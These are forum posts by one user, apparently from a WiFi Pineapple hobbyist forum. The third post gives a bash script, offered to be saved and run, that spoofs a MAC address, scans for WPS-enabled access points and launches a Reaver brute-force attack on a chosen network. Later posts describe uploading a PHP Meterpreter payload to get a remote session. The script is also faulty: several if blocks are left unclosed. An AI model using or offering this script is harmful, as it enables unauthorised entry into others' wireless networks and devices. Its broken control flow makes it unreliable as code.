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Posts posted by Battery_

  1. I'm trying to mess around with this as well. None of the forum posts referenced really have any info on this infusion, also the github seems to be offline and an old link...

    WM can you give us some info and a basic run down of the operation of this thing?


  2. So this may be a dumb question but I'm curious how people are using these two devices together. What tasks are you putting off on the Rasberry Pi? Are you jaming with the Rasberry pi, using it as a web server for the pineapple?

    Just curious as I just received my rasberry pi and I'm looking to see what techniques others have used successfully.


  3. I'm just learning how to Bash Script so I decided to make a nice and easy Reaver for idiots script. Let me know what you guys think or if anything else should be added, or any suggestions on the code. Just using this as a launch off point to learn stuff and eventually hopefully a full module for the pineapple.

    Just save the below to a file and execute

    echo "This script makes it easy to start a reaver attack"
    echo ""
    echo "[+] Do you need to setup a monitor interface? [y/n]"
    read setup
    if [[ $setup == 'y' ]]; then
    #Setup the monitor interface
    echo "[+] What Wireless interfaces do we have..."
    echo "[+] Please select an interface to place into Monitor Mode [wlan0]"
    read interface
    if [[ $interface == '' ]]; then
    interface=wlan0 #Default to wlan0
    echo "[+] Starting monitor Mode for $interface"
    airmon-ng start $interface
    fi #End Mon Mode Setup Portion
    #Start part of script that executes regardless
    echo "[+] What monitor interface should I use? [mon0]"
    read monInterface
    if [[ $monInterface == '' ]]; then
    monInterface=mon0 #Default to mon0
    #Spoof the Mon Mac
    echo "[+] MacSpoofing $monInterface"
    ifconfig $monInterface down
    macchanger -r $monInterface
    ifconfig $monInterface up
    #Check for Targets
    echo ""
    echo "[+] ------------------------------------------------------[+]"
    echo "[+] Checking for WPS enabled APs press (ctrl+c) when done [+]"
    echo "[+] ------------------------------------------------------[+]"
    wash -i $monInterface
    #Set Reaver Target
    echo "[+] What is the MAC for the target AP?"
    read target
    #Set optional functions
    reaver #to show the options available in terminal
    echo "[+] reaver -i $monInterface -b $target"
    echo "[+] Type any other reaver options you'd like besides the above"
    read reaverVars
    #Start REAVERINGGGGG!!!!
    echo "[+] Starting reaver (reaver -i $monInterface -b $target $reaverVars)"
    reaver -i $monInterface -b $target $reaverVars
    #Stop Monitor Mode Interface if the script set it up
    if [[ $setup == 'y' ]]; then
    echo ""
    echo "[+] killing Monitor Interface"
    airmon-ng stop $monInterface

  4. If you have metasploit installed you can generate the meterpreter php payload (msfpayload) and kind of get it done yourself. I didn't really have any luck being able to keep it active, Darren has a script on here if you search meterpreter that should keep it alive.

    I'd search google for php meterpreter payload and you should find some walkthroughs

  5. So I got this working sort of... I just uploaded the meterpreter.php exploit into the www directory and named it m.php

    So when I browse to m.php I get my evil looking linux icon in Armitage and get my meterpreter session. However whenever I try to make a pivot or anything I get "loading scdapi. Try command again later" Anyone else have that issue?

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